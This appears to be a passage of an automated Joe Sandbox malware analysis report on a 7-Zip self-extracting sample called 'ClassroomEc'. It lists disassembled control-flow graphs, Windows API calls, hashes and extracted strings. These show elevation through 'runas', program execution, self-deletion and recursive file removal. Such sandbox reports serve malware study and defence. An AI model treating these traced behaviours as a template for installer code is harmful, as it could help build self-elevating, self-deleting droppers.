                                                                                                                                                      • lstrcmpW.KERNEL32(?,00A99850,?,0000005C,00A750E8), ref: 00A74F51
                                                                                                                                                      • lstrcmpW.KERNEL32(?,00A99848), ref: 00A74F67
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,00000000,?,0000005C,00A750E8), ref: 00A74FB0
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00A74FC3
                                                                                                                                                      • FindNextFileW.KERNELBASE(000000FF,?), ref: 00A74FF5
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00A75007
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00000000), ref: 00A75018
                                                                                                                                                      • SetFileAttributesW.KERNEL32(00A750E8,00000000), ref: 00A75024
                                                                                                                                                      • RemoveDirectoryW.KERNEL32(00A750E8), ref: 00A75032
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Find$AllocatorAttributesDebugDirectoryHeaplstrcmp$CloseCurrentDeleteFirstNextRemove_wmemmove
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 430740293-0
                                                                                                                                                      • Opcode ID: 9aea604fa9aab57ba9fc1f132933ea125c96cb20226a50d9518612fcd101ebc7
                                                                                                                                                      • Instruction ID: a109d847d225b80cf64797023e54fe13bdf990cd1c3512e1175a5ff7f2e74858
                                                                                                                                                      • Opcode Fuzzy Hash: 9aea604fa9aab57ba9fc1f132933ea125c96cb20226a50d9518612fcd101ebc7
                                                                                                                                                      • Instruction Fuzzy Hash: 4F414270E04208ABDB14EFA4DD99BEF7778AF14704F54C69CE41E92091EF70AA45CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1359 a71e40-a71e87 call a710d0 * 2 memset 1364 a71e9b-a71ea1 1359->1364 1365 a71e89-a71e98 1359->1365 1366 a71ea3 1364->1366 1367 a71eaa-a71eb3 1364->1367 1365->1364 1366->1367 1368 a71eb5-a71ebd 1367->1368 1369 a71ec0-a71ee3 call a738f0 call a71d50 call a7d910 1367->1369 1368->1369 1376 a71ee5-a71eff call a84cd0 * 2 1369->1376 1377 a71f01-a71f23 call a712d0 * 2 ShellExecuteExW 1369->1377 1386 a71f7c-a71f7f 1376->1386 1387 a71f25-a71f2e 1377->1387 1388 a71f62-a71f79 call a84cd0 * 2 1377->1388 1390 a71f30-a71f36 WaitForSingleObject 1387->1390 1391 a71f3c-a71f60 CloseHandle call a84cd0 * 2 1387->1391 1388->1386 1390->1391 1391->1386
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00A71E5E
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A71ED4
                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00A71F1B
                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A71F36
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A71F40
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorCloseDebugExecuteHandleHeapObjectShellSingleWaitmemset
                                                                                                                                                      • String ID: <$runas
                                                                                                                                                      • API String ID: 46794241-1187129395
                                                                                                                                                      • Opcode ID: dc939fa32619dc5b321c6ae1b0482197c9e3eb04a3b7114bf7c3e51907217a16
                                                                                                                                                      • Instruction ID: 5db5bbd190106ef475f51cd7367e4da6d90e78293b397619ad34717ad5bc8998
                                                                                                                                                      • Opcode Fuzzy Hash: dc939fa32619dc5b321c6ae1b0482197c9e3eb04a3b7114bf7c3e51907217a16
                                                                                                                                                      • Instruction Fuzzy Hash: 77311770D102099BCB04EFD8DC96BEEBBB8FF14300F10C119E519AB295EB74AA55CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1471 a74c30-a74c6a lstrlenW call a716a0 call a735b0 1476 a74c7c-a74c8f 1471->1476 1477 a74c6c-a74c7a 1471->1477 1478 a74c92-a74c95 1476->1478 1477->1476 1477->1478 1479 a74c98-a74c9f 1478->1479 1480 a74ca5-a74ca9 call a73d20 1479->1480 1481 a74d6e-a74d85 GetSystemTimeAsFileTime GetFileAttributesW 1479->1481 1486 a74cae-a74cb3 1480->1486 1483 a74d87-a74d99 call a73c80 1481->1483 1484 a74db2-a74db6 call a73d20 1481->1484 1483->1484 1495 a74d9b-a74dad call a84cd0 1483->1495 1488 a74dbb-a74dc0 1484->1488 1489 a74cb5 1486->1489 1490 a74cba 1486->1490 1492 a74dc2-a74de4 call a7b300 call a84cd0 1488->1492 1493 a74de9-a74def 1488->1493 1489->1481 1494 a74cc5-a74cc9 1490->1494 1510 a74ec0-a74ec3 1492->1510 1500 a74df5-a74e27 memcpy 1493->1500 1501 a74eae-a74ebd call a84cd0 1493->1501 1498 a74ceb-a74cef 1494->1498 1499 a74ccb-a74cd8 1494->1499 1495->1510 1508 a74cf1-a74cf5 1498->1508 1509 a74d5d-a74d69 1498->1509 1499->1498 1504 a74cda-a74ce7 1499->1504 1506 a74e32-a74e3e 1500->1506 1507 a74e29-a74e2f 1500->1507 1501->1510 1504->1498 1512 a74ce9 1504->1512 1514 a74e40-a74e4d 1506->1514 1515 a74e69-a74e83 call a73d20 1506->1515 1507->1506 1516 a74cf7-a74d03 1508->1516 1517 a74d36-a74d58 call a7b300 call a84cd0 1508->1517 1509->1479 1512->1494 1514->1515 1523 a74e4f-a74e5c 1514->1523 1529 a74e85-a74ea7 call a7b300 call a84cd0 1515->1529 1530 a74ea9 1515->1530 1516->1517 1518 a74d05-a74d11 1516->1518 1517->1510 1518->1517 1525 a74d13-a74d1d 1518->1525 1523->1515 1524 a74e5e-a74e67 1523->1524 1524->1506 1525->1517 1528 a74d1f-a74d31 call a84cd0 1525->1528 1528->1510 1529->1510 1530->1493
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00A72B43,00000000,00000000,?), ref: 00A74C3A
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A74C4A
                                                                                                                                                        • Part of subcall function 00A735B0: _DebugHeapAllocator.LIBCPMTD ref: 00A735C0
                                                                                                                                                        • Part of subcall function 00A735B0: wcsncpy.MSVCRT ref: 00A735E4
                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00A72B43,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A72B43,00000000), ref: 00A74D72
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,00A72B43,00000000,00000000,?), ref: 00A74D7C
                                                                                                                                                        • Part of subcall function 00A7B300: wvsprintfW.USER32(?,?,?), ref: 00A7B32D
                                                                                                                                                        • Part of subcall function 00A7B300: GetLastError.KERNEL32 ref: 00A7B33D
                                                                                                                                                        • Part of subcall function 00A7B300: FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00A7B36C
                                                                                                                                                        • Part of subcall function 00A7B300: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00A7B393
                                                                                                                                                        • Part of subcall function 00A7B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3A8
                                                                                                                                                        • Part of subcall function 00A7B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3BB
                                                                                                                                                        • Part of subcall function 00A7B300: ??2@YAPAXI@Z.MSVCRT ref: 00A7B3DC
                                                                                                                                                        • Part of subcall function 00A7B300: lstrcpyW.KERNEL32(?,?), ref: 00A7B404
                                                                                                                                                        • Part of subcall function 00A7B300: lstrcpyW.KERNEL32(?,?), ref: 00A7B437
                                                                                                                                                        • Part of subcall function 00A7B300: ??3@YAXPAX@Z.MSVCRT ref: 00A7B45F
                                                                                                                                                        • Part of subcall function 00A7B300: LocalFree.KERNEL32(?), ref: 00A7B46E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$AllocatorDebugFileFormatHeapMessageTimelstrcpy$??2@??3@AttributesErrorFreeLastLocalSystemwcsncpywvsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1540793163-0
                                                                                                                                                      • Opcode ID: 16deb58c9d469825eb4cb415fe829ff0b6a9bcc8eb8fbfb6fc1ad9e5b909af72
                                                                                                                                                      • Instruction ID: c0a217c7df9bdab20d0650bd961437d8753cc673224bd8a9827798cb2def109f
                                                                                                                                                      • Opcode Fuzzy Hash: 16deb58c9d469825eb4cb415fe829ff0b6a9bcc8eb8fbfb6fc1ad9e5b909af72
                                                                                                                                                      • Instruction Fuzzy Hash: AD815E74A00219DBDF14DF98DD91AFEB3B5BF48300F10C558E809AB251EB74AE51DB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1617 a73c80-a73ca1 FindFirstFileW 1618 a73ca7-a73cba FindClose 1617->1618 1619 a73ca3-a73ca5 1617->1619 1621 a73cbc-a73cc7 SetLastError 1618->1621 1622 a73cc9-a73cd0 1618->1622 1620 a73d18-a73d1b 1619->1620 1621->1620 1623 a73cd2-a73cde call a73c30 1622->1623 1624 a73ce0-a73ce7 1622->1624 1623->1620 1626 a73d13 1624->1626 1627 a73ce9-a73cfc CompareFileTime 1624->1627 1626->1620 1628 a73d05-a73d11 call a73c30 1627->1628 1629 a73cfe-a73d03 1627->1629 1628->1620 1629->1620
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00A73C94
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00A73CAB
                                                                                                                                                      • SetLastError.KERNEL32(00000010), ref: 00A73CBE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseErrorFileFirstLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4020440971-0
                                                                                                                                                      • Opcode ID: e07809e3942e522350e73210f68a95774126b1b780e12e54c384071a235bdb47
                                                                                                                                                      • Instruction ID: 1f2ce7c4d8b47ff14aef77daf7dfa70ab641192c72b5de8d86c88acf72b5f342
                                                                                                                                                      • Opcode Fuzzy Hash: e07809e3942e522350e73210f68a95774126b1b780e12e54c384071a235bdb47
                                                                                                                                                      • Instruction Fuzzy Hash: 9711A577A00208EBDF20DBA4DD0969A3374AB44310F22CA55E51EA7191DB31DB85EB93
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1633 a75080-a750a1 FindFirstFileW 1634 a750a3-a750a8 1633->1634 1635 a750aa-a750bd FindClose 1633->1635 1636 a750eb-a750ee 1634->1636 1637 a750df-a750e3 call a74ed0 1635->1637 1638 a750bf-a750cd SetFileAttributesW 1635->1638 1642 a750e8 1637->1642 1639 a750cf-a750d9 DeleteFileW 1638->1639 1640 a750db-a750dd 1638->1640 1639->1636 1640->1636 1642->1636
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00A75094
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00A750AE
                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A750C5
                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00A750D3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Find$AttributesCloseDeleteFirst
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3319113142-0
                                                                                                                                                      • Opcode ID: b9d4bc2e5fc4d7b2d54befb9cd5e373f315851f702001fde9e799a98e6caa387
                                                                                                                                                      • Instruction ID: b2db8ef18d1953d85f7359b1b66370e55ddc27e1586d452ff312d852ad33a646
                                                                                                                                                      • Opcode Fuzzy Hash: b9d4bc2e5fc4d7b2d54befb9cd5e373f315851f702001fde9e799a98e6caa387
                                                                                                                                                      • Instruction Fuzzy Hash: 1AF08675A00A08FFDB10DBB4EC49ADB37749B44311F10C654E91E97180DA75DD879B91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 a77530-a7755c ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z GetLastError GetTickCount 1 a7755e-a77569 GetTickCount 0->1 2 a77578-a77583 0->2 1->2 3 a7756b-a77576 GetTickCount 1->3 4 a77585-a77591 2->4 5 a77593-a7762e call a710d0 * 3 GetModuleHandleW GetProcAddress FreeConsole call a76680 GetCommandLineW call a738f0 call a71d50 call a74320 call a712d0 call a76d00 2->5 3->2 3->5 4->2 24 a77662-a77681 call a735b0 GetModuleFileNameW 5->24 25 a77630-a7765d call a77310 call a84cd0 * 3 5->25 30 a77683-a776b7 call a7b300 call a84cd0 * 3 24->30 31 a776bc-a776de call a73580 call a76d00 24->31 49 a783ec-a783f0 25->49 30->49 46 a776e0-a77708 call a84cd0 * 3 31->46 47 a7770d-a7773f call a72370 * 2 call a75be0 31->47 46->49 65 a77745-a7779e call a716c0 call a712d0 call a71d50 call a712d0 call a71d50 call a89600 47->65 66 a777f0-a7781a call a761c0 call a71d50 call a712d0 call a711c0 47->66 95 a777a0-a777a9 call a716c0 65->95 96 a777ae-a777eb call a72370 call a75e70 call a89450 call a712d0 * 2 65->96 83 a77860-a77892 call a73b10 call a78790 call a78480 call a761f0 66->83 84 a7781c-a7785b call a712d0 call a7b300 call a84cd0 * 3 66->84 114 a77894-a778c3 call a84cd0 * 4 83->114 115 a778c8-a778e0 call a76d00 83->115 84->49 95->96 96->66 114->49 123 a778e6-a778ef 115->123 124 a779b1 115->124 128 a778f1-a778f7 123->128 129 a778fa-a77902 123->129 127 a779b8-a779be 124->127 133 a77a06-a77a20 call a78540 call a71760 127->133 134 a779c0-a77a04 wsprintfW call a75e70 call a736c0 127->134 128->129 135 a77904-a7790d 129->135 136 a7791a-a77922 129->136 158 a77a57-a77a66 call a76dc0 call a71230 133->158 159 a77a22-a77a52 call a84cd0 * 4 133->159 134->127 135->136 140 a7790f-a77918 135->140 142 a77924-a77939 call a76ab0 136->142 143 a7797c-a779ac call a84cd0 * 4 136->143 140->129 142->143 154 a7793b-a77977 call a7b300 call a84cd0 * 4 142->154 143->49 154->49 180 a77a6d-a77a85 call a74c00 158->180 159->49 187 a77a87-a77aaa call a716a0 call a74a20 180->187 188 a77b02-a77b0e call a76880 180->188 201 a77aac-a77ab7 call a84cd0 187->201 202 a77ab9-a77afd call a716c0 call a712d0 call a736c0 call a84cd0 187->202 197 a77b10 188->197 198 a77b1a-a77b29 call a78520 188->198 197->198 205 a77b2f-a77b45 call a74c00 198->205 206 a77bb8-a77bc7 call a784e0 198->206 201->188 202->180 217 a77b47-a77b51 call a75e70 205->217 218 a77b54-a77bb3 call a78430 call a797f0 call a78460 call a84cd0 * 4 205->218 215 a77bdb-a77bfb CoInitializeEx call a74c00 206->215 216 a77bc9-a77bd5 206->216 230 a77c12-a77c1c call a76800 215->230 231 a77bfd-a77c0b call a71d50 215->231 216->215 217->218 218->49 240 a77c1f-a77c35 call a74c00 230->240 231->230 246 a77cc2-a77cd9 call a710d0 call a784c0 240->246 247 a77c3b-a77c4a call a784e0 240->247 261 a77df3-a77e04 call a738d0 246->261 262 a77cdf-a77ce9 call a784a0 246->262 247->246 254 a77c4c-a77c60 call a7b070 247->254 264 a77c97-a77ca8 GetKeyState 254->264 265 a77c62-a77c92 call a84cd0 * 4 254->265 274 a77e06-a77e17 call a74c00 261->274 275 a77e2a-a77e37 call a738d0 261->275 273 a77cef-a77d23 call a71d50 call a71c50 call a712d0 call a74c00 262->273 264->246 271 a77caa-a77cbd call a71b80 call a71ba0 264->271 265->49 271->246 315 a77d77-a77d92 273->315 316 a77d25-a77d72 call a712d0 call a7b300 call a84cd0 * 5 273->316 274->275 287 a77e19-a77e26 call a71d50 274->287 288 a77e59-a77e68 call a784c0 275->288 289 a77e39-a77e4a call a74c00 275->289 287->275 305 a77f05-a77f14 call a738d0 288->305 306 a77e6e-a77e7d call a784e0 288->306 289->288 303 a77e4c-a77e54 call a71d50 289->303 303->288 317 a77f16-a77f22 call a73790 305->317 318 a77f49-a77f78 call a72c60 call a76800 call a738d0 305->318 306->305 314 a77e83-a77e95 306->314 314->305 319 a77e97-a77eae call a7b200 314->319 320 a77da6-a77db2 315->320 321 a77d94-a77da0 315->321 316->49 330 a77f27-a77f47 call a72370 call a84cd0 317->330 352 a77f8b-a77f98 call a84cd0 318->352 353 a77f7a-a77f86 call a72370 318->353 319->305 338 a77eb0-a77eb9 319->338 327 a77dc6-a77dd2 320->327 328 a77db4-a77dc0 320->328 321->273 321->320 334 a77de6-a77dee call a71d50 327->334 335 a77dd4-a77de0 327->335 328->273 328->327 357 a77f9d-a77fbb call a712d0 call a7d910 330->357 334->261 335->273 335->334 343 a77ebb-a77ec3 call a84cd0 338->343 344 a77ec8-a77f00 call a84cd0 * 5 338->344 343->240 344->49 352->357 353->352 373 a77fdd-a77ff0 call a7d910 call a716c0 357->373 374 a77fbd-a77fdb call a712d0 call a7d910 357->374 388 a77ff5-a78004 call a784e0 373->388 374->373 374->388 391 a78006-a7800f 388->391 392 a78015-a78029 call a73050 388->392 391->392 395 a7806d-a78081 call a76880 call a78500 392->395 396 a7802b-a78068 call a774e0 call a84cd0 * 5 392->396 405 a78083-a7808c 395->405 406 a78092-a780b7 call a710d0 * 2 call a784c0 395->406 396->49 405->406 408 a782a7-a782ae 405->408 435 a780b9-a780c5 call a71cc0 406->435 436 a780c8-a780d5 call a738d0 406->436 413 a782b0-a782bf call a784e0 408->413 414 a782cb-a782d2 408->414 413->414 428 a782c1 413->428 418 a782d4-a782ea call a74c00 414->418 419 a78331-a78340 call a78500 414->419 418->419 434 a782ec-a782f6 418->434 432 a783b4-a783e6 call a84cd0 * 5 419->432 433 a78342-a78352 419->433 428->414 432->49 438 a78354-a7835b 433->438 439 a7835f 433->439 441 a78302-a7832c call a78400 call a797f0 call a78460 434->441 442 a782f8 434->442 435->436 457 a78202-a7822c call a784a0 call a712d0 * 2 call a72390 436->457 458 a780db-a780e4 436->458 445 a78361-a78378 call a72c60 call a78570 438->445 446 a7835d-a78390 call a74c00 438->446 439->432 441->419 442->441 445->432 446->432 472 a78392-a7839b 446->472 499 a78231 457->499 466 a78200 458->466 467 a780ea-a7815c call a891a0 * 2 call a712d0 call a71d50 call a804f0 * 2 call a712d0 GetFileAttributesW 458->467 473 a78234-a7828c call a76880 call a784a0 call a771c0 call a712d0 SetCurrentDirectoryW call a784a0 call a771c0 call a774e0 466->473 517 a781c2-a781fb call a712d0 call a716a0 call a71f80 call a84cd0 467->517 518 a7815e-a781bd call a774e0 call a7b300 call a84cd0 * 7 467->518 472->432 478 a7839d-a783b1 call a72c60 call a78570 472->478 516 a78291-a782a2 call a84cd0 * 2 473->516 478->432 499->473 516->408 517->466 518->49
                                                                                                                                                      APIs
                                                                                                                                                      • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00A7753F
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A77548
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A77551
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A7755E
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A7756B
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A775C5
                                                                                                                                                      • GetProcAddress.KERNEL32(?,FreeConsole), ref: 00A775D7
                                                                                                                                                      • FreeConsole.KERNELBASE ref: 00A775E0
                                                                                                                                                      • GetCommandLineW.KERNEL32(?), ref: 00A775EC
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A775FF
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,?,?,00000000), ref: 00A77679
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A77717
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A77726
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A7776A
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A77786
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A777B8
                                                                                                                                                        • Part of subcall function 00A76D00: lstrlenW.KERNEL32(?), ref: 00A76D5E
                                                                                                                                                        • Part of subcall function 00A76D00: lstrlenW.KERNEL32(?), ref: 00A76D6B
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A777FB
                                                                                                                                                      • wsprintfW.USER32 ref: 00A779D2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocatorDebugHeap$CountTick$Modulelstrlen$?_set_new_handler@@AddressCommandConsoleErrorFileFreeHandleLastLineNameProcwsprintf
                                                                                                                                                      • String ID: $7ZipSfx.%03x$AutoInstall$BeginPrompt$Delete$ExecuteFile$FinishMessage$FreeConsole$HelpText$InstallPath$RunProgram$SelfDelete$SetEnvironment$SfxString%d$Shortcut$d$kernel32.dll$sfxconfig$sfxtest$sfxversion
                                                                                                                                                      • API String ID: 313208911-2568464168
                                                                                                                                                      • Opcode ID: 870a1e580e130d5d4cb1ce0966129916dae47b465481e3dc382322909aaf7368
                                                                                                                                                      • Instruction ID: 80b6275317ed15fa10a511d05ccc15ec49413ada94af2207203a49b0e96623e6
                                                                                                                                                      • Opcode Fuzzy Hash: 870a1e580e130d5d4cb1ce0966129916dae47b465481e3dc382322909aaf7368
                                                                                                                                                      • Instruction Fuzzy Hash: EE8281B0E001199BCB14FBA9DD56BEE77B4EF54304F50C068F0096B192EF746A95CBA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 578 a71f80-a71fcd call a710d0 call a73520 call a76850 call a712d0 587 a71fd0-a71fd7 578->587 588 a71fdd-a71ff7 call a762e0 587->588 589 a72109-a7210f 587->589 598 a7200a-a72024 call a762e0 588->598 599 a71ff9-a72008 588->599 591 a72183-a72196 call a72370 call a89450 589->591 592 a72111-a7211a 589->592 607 a7219b-a721db call a710d0 call a712d0 call a738f0 call a716a0 call a76850 call a71df0 591->607 594 a72144-a7214b call a71d50 592->594 595 a7211c-a72142 call a71d50 call a89450 * 2 592->595 604 a72150-a72166 call a74c00 594->604 595->604 612 a72026-a7202d 598->612 613 a7204c-a72066 call a762e0 598->613 599->587 619 a72181 604->619 620 a72168-a7217c call a89450 * 2 604->620 651 a721e1-a721e9 607->651 652 a7231c-a72346 call a84cd0 * 2 call a73670 call a84cd0 607->652 617 a72044-a7204a 612->617 618 a7202f-a7203f _wtol 612->618 628 a72080-a7209a call a762e0 613->628 629 a72068-a7207b 613->629 617->587 618->617 619->607 620->619 635 a720b4-a720c7 call a76420 628->635 636 a7209c-a720af 628->636 629->587 642 a720db-a720ee call a76490 635->642 643 a720c9-a720d6 635->643 636->587 649 a72102 642->649 650 a720f0-a720fd 642->650 643->587 649->589 650->587 653 a7220c-a7221f call a76850 651->653 654 a721eb-a721f2 call a89450 651->654 675 a7234c-a7234f 652->675 666 a72317 call a71d70 653->666 667 a72225-a72296 call a891e0 call a891a0 call a89160 call a712d0 call a716a0 call a804f0 * 3 call a712d0 call a71e40 653->667 659 a721f7-a721ff 654->659 659->653 662 a72201-a7220a 659->662 662->659 666->652 692 a7229b-a722a0 667->692 693 a722a2-a722aa call a84cd0 692->693 694 a722ac-a722b5 692->694 693->666 695 a722b7-a722c2 GetLastError 694->695 696 a722c4-a722d6 call a712d0 call a7b300 694->696 695->696 698 a722d9-a72310 call a774e0 call a84cd0 * 3 call a73670 call a84cd0 695->698 696->698 698->666 698->675
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A73520: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00A71FB2,?), ref: 00A73541
                                                                                                                                                        • Part of subcall function 00A73520: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 00A73564
                                                                                                                                                      • _wtol.MSVCRT(?,?,?,?,?,?,?,?), ref: 00A72036
